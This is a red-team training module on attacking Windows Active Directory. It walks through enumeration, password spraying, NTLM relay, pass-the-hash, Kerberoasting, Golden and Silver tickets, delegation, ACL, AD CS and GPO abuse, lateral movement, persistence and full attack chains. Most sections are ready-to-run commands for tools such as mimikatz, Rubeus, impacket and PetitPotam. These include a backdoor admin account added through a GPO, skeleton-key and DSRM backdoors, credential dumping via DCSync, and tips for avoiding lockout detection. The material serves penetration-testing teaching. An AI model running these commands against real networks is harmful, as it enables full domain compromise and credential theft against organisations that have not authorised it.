2.1 Windows Active Directory — Attack Vectors & Paths

Scope: This document covers how attackers identify, enumerate, and abuse misconfigurations and design weaknesses in Windows Active Directory environments. Each section follows the pattern: What it is → How attackers spot it → How they abuse it.

Table of Contents

1. Reconnaissance & Enumeration
2. Credential-Based Attacks
3. Kerberos Abuse
4. ACL / ACE Abuse
5. Active Directory Certificate Services (AD CS)
6. Group Policy Abuse
7. Lateral Movement via Windows Services
8. Domain Persistence
9. Trust Relationship Abuse
10. Common Attack Chains (Full Paths)

1. Reconnaissance & Enumeration

What It Is

Before attacking, adversaries need to understand the AD environment — domain structure, users, groups, computers, GPOs, trusts, and service accounts.

How Attackers Spot the Opportunity

AD exposes a massive amount of information to any authenticated domain user by default. LDAP queries require no special privileges, and most environments leave default read permissions in place.

Common enumeration techniques:

LDAP Enumeration

# Native — no extra tools needed
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-ADUser -Filter * -Properties *
Get-ADGroup -Filter * | Select Name
Get-ADComputer -Filter * -Properties OperatingSystem

BloodHound / SharpHound — Maps the entire AD graph, including attack paths to Domain Admin:

# Run collector on any domain-joined box as a standard user
.\SharpHound.exe -c All --outputdirectory C:\temp
# Import the ZIP into BloodHound GUI → query "Shortest path to DA"

PowerView

# Enumerate shares, sessions, local admins, trust paths
Get-NetDomain
Get-NetUser -SPN           # find service accounts → Kerberoasting targets
Find-LocalAdminAccess      # where does this user have local admin?
Get-DomainTrust            # enumerate all trust relationships
Invoke-ShareFinder         # find accessible shares across the domain

How They Abuse It

Enumeration feeds every subsequent attack. The output of BloodHound directly answers: "What is the shortest path from my current user to Domain Admin?" Attackers use it to:

• Identify Kerberoastable / ASREPRoastable accounts
• Find users with DCSync rights
• Find paths via ACL misconfigurations
• Locate computers where high-value sessions exist

2. Credential-Based Attacks

2.1 Password Spraying

What it is: Testing one or a few common passwords across many accounts to avoid lockout.

How attackers spot it: Any list of valid usernames (from LDAP enum, LinkedIn, email format guessing) combined with a weak password policy.

How they abuse it:

# Spray from Linux using kerbrute (no lockout risk if threshold is known)
kerbrute passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Winter2024!'

# From Windows using Invoke-DomainPasswordSpray
Invoke-DomainPasswordSpray -Password 'Spring2025!' -OutFile hits.txt

Detection bypass: Stay at 1 attempt per account per 30 minutes. Check the domain's lockoutThreshold via net accounts /domain.

2.2 NTLM Hash Capture & Relay

What it is: Capturing NTLMv2 challenge-response hashes in transit and either cracking them offline or relaying them to authenticate elsewhere.

How attackers spot it:

• LLMNR / NBT-NS still enabled (default on older Windows)
• SMB signing not required (check with nmap --script smb-security-mode)
• NTLM still enabled network-wide

How they abuse it:

# Step 1 — Poison LLMNR/NBT-NS with Responder
sudo responder -I eth0 -wrf
# Captures NTLMv2 hashes from machines that mistype a hostname

# Step 2a — Crack offline
hashcat -m 5600 captured.hash /usr/share/wordlists/rockyou.txt

# Step 2b — Relay to other hosts (when SMB signing is off)
sudo ntlmrelayx.py -tf targets.txt -smb2support
# Authenticates to each target in targets.txt as the captured user

2.3 Pass-the-Hash (PtH)

What it is: Using an NTLM hash directly to authenticate without knowing the plaintext password.

How attackers spot it: Dump hashes from SAM, LSASS, or NTDS.dit. PtH works on any host where that account has access as long as it's a local or domain account.

How they abuse it:

# Move laterally with impacket
impacket-psexec -hashes :aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 corp/administrator@10.10.10.5

# Or with CrackMapExec
crackmapexec smb 10.10.10.0/24 -u administrator -H 5fbc3d5fec8206a30f4b6c473d68ae76

2.4 Pass-the-Ticket (PtT)

What it is: Stealing a valid Kerberos ticket (TGT or TGS) from memory and injecting it to authenticate as that user.

How attackers spot it: Any user is logged in somewhere. If an attacker has SYSTEM on that machine, they can dump tickets.

How they abuse it:

# Dump tickets from memory
.\Rubeus.exe dump /nowrap

# Inject a stolen ticket into the current session
.\Rubeus.exe ptt /ticket:<base64_ticket>

# Verify
klist

3. Kerberos Abuse

3.1 Kerberoasting

What it is: Any domain user can request a service ticket (TGS) for any account with a Service Principal Name (SPN). That ticket is encrypted with the service account's NTLM hash — attackable offline.

How attackers spot it:

# Find Kerberoastable accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Or with PowerView:
Get-DomainUser -SPN

High-value targets: accounts with SPN set AND high privileges (e.g., svc_sql, svc_backup).

How they abuse it:

# Request TGS for all SPNs and output crackable hashes
.\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap

# Crack offline
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

Why it matters: Service accounts often have weak passwords set years ago and never rotated. Cracking gives a valid domain credential — sometimes with admin rights.

3.2 AS-REP Roasting

What it is: Accounts with "Do not require Kerberos preauthentication" enabled send an AS-REP encrypted with their password hash — without the attacker needing to authenticate first.

How attackers spot it:

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth

How they abuse it:

# From Linux, no credentials needed
impacket-GetNPUsers corp.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt

# Crack
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

3.3 Golden Ticket

What it is: A forged TGT signed with the KRBTGT account's hash. Valid for any user, any service, any machine — essentially unlimited domain access.

How attackers spot the opportunity: After obtaining Domain Admin or DCSync rights, dump the KRBTGT hash.

How they abuse it:

# Dump KRBTGT hash (requires DA / DCSync rights)
.\mimikatz.exe "lsadump::dcsync /user:krbtgt" exit

# Forge a Golden Ticket
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt" exit

# Now you have a ticket injected — access anything
dir \\dc01\C$

Why it matters: Golden tickets can be set to expire in 10+ years and survive password resets of regular accounts (only KRBTGT reset kills them).

3.4 Silver Ticket

What it is: A forged TGS for a specific service signed with the service account's hash — bypasses the DC entirely.

How they abuse it:

# Forge a Silver Ticket for CIFS service on a target host
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:fileserver.corp.local /service:cifs /rc4:<service_account_hash> /ptt" exit

3.5 Unconstrained Delegation

What it is: Computers/accounts configured with Unconstrained Delegation cache TGTs of every user who authenticates to them. An attacker with SYSTEM on such a host can steal those TGTs — including the DC's machine account TGT.

How attackers spot it:

# Find systems with Unconstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
Get-ADUser -Filter {TrustedForDelegation -eq $true}

How they abuse it (PrinterBug / SpoolSample):

# Coerce the DC to authenticate to our controlled host
.\SpoolSample.exe DC01 ATTACKER-HOST

# On attacker host (with Unconstrained Delegation), grab the DC's TGT
.\Rubeus.exe monitor /interval:5 /filteruser:DC01$

# Use the DC$ TGT → DCSync → full domain compromise
.\Rubeus.exe ptt /ticket:<DC_TGT>
.\mimikatz.exe "lsadump::dcsync /user:corp\krbtgt" exit

3.6 Constrained Delegation Abuse

What it is: Accounts/computers allowed to delegate to specific services (S4U2Proxy). If an attacker controls the delegating account, they can impersonate any user to the allowed service.

How attackers spot it:

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

How they abuse it:

# Get TGT for the constrained delegation account, then forge a service ticket as Domain Admin
.\Rubeus.exe s4u /user:svc_IIS /rc4:<hash> /impersonateuser:Administrator /msdsspn:"http/webserver.corp.local" /ptt

4. ACL / ACE Abuse

What It Is

Active Directory objects have Access Control Lists (ACLs) with Access Control Entries (ACEs). Misconfigurations allow low-privileged users to modify high-privileged objects — users, groups, GPOs, computers.

How Attackers Spot It

BloodHound is the primary tool — query: "Find Shortest Paths to Domain Admins". Common abusable ACEs:

How They Abuse It

Reset a user's password (ForceChangePassword):

$pass = ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force
Set-ADAccountPassword -Identity TargetUser -NewPassword $pass -Reset

Add self to a group (AddMember / GenericAll on group):

Add-ADGroupMember -Identity "Domain Admins" -Members attacker_user

WriteDACL → grant self DCSync rights:

# Using PowerView
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity attacker_user -Rights DCSync

DCSync (once DCSync ACE is granted):

.\mimikatz.exe "lsadump::dcsync /user:corp\krbtgt /domain:corp.local" exit

5. Active Directory Certificate Services (AD CS)

What It Is

AD CS issues X.509 certificates for authentication, encryption, and code signing. Certificate templates with weak settings are a direct path to credential theft and persistence.

ESC1 — Misconfigured Certificate Templates

How attackers spot it:

# Enumerate with Certipy
certipy find -u attacker@corp.local -p 'Password1' -dc-ip 10.10.10.1 -vulnerable

Look for templates where:

• CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is set (requester controls the SAN)
• Client Authentication EKU is present
• Low-privileged users have Enroll rights

How they abuse it:

# Request a cert as Domain Admin — you supply the SAN
certipy req -u attacker@corp.local -p 'Password1' -dc-ip 10.10.10.1 -ca 'corp-CA' -template 'VulnerableTemplate' -upn 'administrator@corp.local'

# Authenticate with the cert → get DA's NTLM hash
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1

ESC8 — NTLM Relay to AD CS HTTP Enrollment

How attackers spot it: AD CS web enrollment endpoint (/certsrv) running over HTTP (no HTTPS required), combined with a coercion opportunity.

How they abuse it:

# Relay NTLM auth from DC to AD CS → get DC$ certificate → DCSync
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Coerce DC auth (PrinterBug / PetitPotam)
python3 PetitPotam.py attacker-ip dc01.corp.local
# Use the issued cert
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.1

6. Group Policy Abuse

What It Is

Group Policy Objects (GPOs) control configuration across the domain. If an attacker can write to a GPO that applies to high-value machines or users, they can deploy malicious settings.

How Attackers Spot It

# Find GPOs where low-priv users have write rights
Get-DomainGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "Write" -and $_.IdentityReference -notmatch "Domain Admins|Enterprise Admins|SYSTEM"}

BloodHound: Query "Find GPO Objects Where Domain Users Can Modify"

How They Abuse It

# Using SharpGPOAbuse — add an immediate scheduled task via a writable GPO
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Pwn" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add" --GPOName "Vulnerable GPO"

# Force policy refresh
gpupdate /force

7. Lateral Movement via Windows Services

7.1 WinRM / PowerShell Remoting

How attackers spot it:

# Check if WinRM is open
nmap -p 5985,5986 10.10.10.0/24
crackmapexec winrm 10.10.10.0/24 -u user -p password

How they abuse it:

# Enter remote session
Enter-PSSession -ComputerName TARGET -Credential $cred

# Or with Evil-WinRM
evil-winrm -i 10.10.10.5 -u administrator -p 'Password1'

7.2 WMI Lateral Movement

How attackers spot it: WMI is enabled by default. If an account has local admin, WMI is a valid remote execution path.

How they abuse it:

# Remote execution via WMI (no tool needed)
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred

# With CrackMapExec
crackmapexec smb 10.10.10.5 -u admin -p 'Password1' -x "whoami" --exec-method wmiexec

7.3 DCOM Lateral Movement

How attackers spot it: DCOM objects (MMC20, ShellWindows, ShellBrowserWindow) allow remote code execution when local admin access exists.

How they abuse it:

# Using DCOM MMC20.Application object
$com = [Activator]::CreateInstanceGetTypeFromProgID("MMC20.Application","10.10.10.5")
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c calc.exe','7')

7.4 SCM / Remote Service Creation (PsExec-style)

How attackers spot it: SMB port 445 open, admin share (\\TARGET\ADMIN$) accessible, SMB signing off or credentials available.

How they abuse it:

impacket-psexec corp/administrator:'Password1'@10.10.10.5
impacket-smbexec corp/administrator:'Password1'@10.10.10.5

8. Domain Persistence

8.1 DCSync (Simulated Domain Replication)

What it is: Any account with Replicating Directory Changes + Replicating Directory Changes All rights can pull password hashes from the DC via DRSUAPI — no shell on the DC needed.

# Check who has DCSync rights
Get-ObjectAcl -DistinguishedName "DC=corp,DC=local" -ResolveGUIDs | Where-Object {$_.ObjectAceType -match "Replication"}

# Perform DCSync
.\mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" exit

8.2 AdminSDHolder Abuse

What it is: AdminSDHolder is a template object whose ACL is propagated to all protected groups (Domain Admins, etc.) by the SDProp process every 60 minutes.

How they abuse it: Write a malicious ACE to AdminSDHolder → it automatically propagates to protected groups.

# Grant attacker GenericAll on AdminSDHolder → propagates to DA within 60 min
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=corp,DC=local" -PrincipalIdentity attacker_user -Rights All

8.3 DSRM Backdoor

What it is: The Directory Services Restore Mode (DSRM) account is a local admin on DCs that can be used even when the domain is down. Its hash can be configured to allow network logon.

# Dump DSRM hash
.\mimikatz.exe "token::elevate" "lsadump::sam" exit

# Enable network DSRM logon (registry key on DC)
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2

# Authenticate with DSRM hash (Pass-the-Hash)
impacket-secretsdump -hashes :dsrm_hash 'DC01/Administrator@10.10.10.1' -just-dc-user Administrator

8.4 Skeleton Key

What it is: A patch injected into LSASS on a DC that makes ANY account accept a master password (mimikatz by default) in addition to their real password. Does NOT survive reboots.

.\mimikatz.exe "privilege::debug" "misc::skeleton" exit
# Now any user can auth with password "mimikatz" alongside their real password

9. Trust Relationship Abuse

What It Is

Domain trusts allow users in one domain to access resources in another. Misconfigurations or design weaknesses allow attackers to escalate across domains or forests.

How Attackers Spot It

Get-DomainTrust
Get-ADTrust -Filter *
nltest /domain_trusts

SID History Injection (Cross-Domain Privilege Escalation)

How they abuse it: If a bidirectional or outbound trust exists and SID filtering is disabled, inject a DA SID from the target domain into the SID History attribute of an account in the source domain.

# Requires DA in source domain
.\mimikatz.exe "kerberos::golden /user:attacker /domain:child.corp.local /sid:<child_SID> /sids:<parent_DA_SID> /krbtgt:<child_krbtgt_hash> /ptt" exit
# Now operating with Enterprise Admin rights in parent domain

10. Common Attack Chains (Full Paths)

Chain A: Standard User → Domain Admin via Kerberoasting

[Foothold as domain user]
    → Enumerate SPNs (Get-DomainUser -SPN)
    → Kerberoast high-priv SPN (Rubeus)
    → Crack hash offline (Hashcat)
    → Authenticate as service account
    → Service account has DA membership or local admin on DC
    → DCSync → krbtgt hash → Golden Ticket

Chain B: Standard User → Domain Admin via ACL Abuse

[Foothold as domain user]
    → Run BloodHound → find ACL path to DA
    → Exploit WriteDACL / GenericAll on intermediate object
    → Grant self DCSync rights on domain object
    → DCSync → full credential dump

Chain C: No Credentials → Domain Admin via AD CS (ESC8)

[Network access, no creds]
    → Identify AD CS HTTP enrollment endpoint
    → Run PetitPotam to coerce DC NTLM auth
    → Relay to /certsrv → obtain DC$ certificate
    → Authenticate with cert → get DC$ NTLM hash
    → DCSync as DC$ → krbtgt hash → Golden Ticket

Chain D: Local Admin → Domain Admin via Unconstrained Delegation

[Local admin on server with Unconstrained Delegation]
    → Monitor for incoming tickets (Rubeus monitor)
    → Coerce DC auth via PrinterBug / PetitPotam
    → DC$ TGT lands in memory on delegation host
    → Inject TGT → DCSync → krbtgt

Chain E: Standard User → Domain Admin via GPO Write

[Foothold as domain user]
    → Enumerate GPO write permissions (PowerView / BloodHound)
    → Identify writable GPO linked to Domain Controllers OU
    → SharpGPOAbuse → add attacker to local admins on DC
    → psexec/WinRM to DC → dump NTDS.dit

Quick Reference: Detection Artefacts

Tools Summary

Document: Red Teaming 101 — Module 2.1 | For authorized penetration testing and security research only.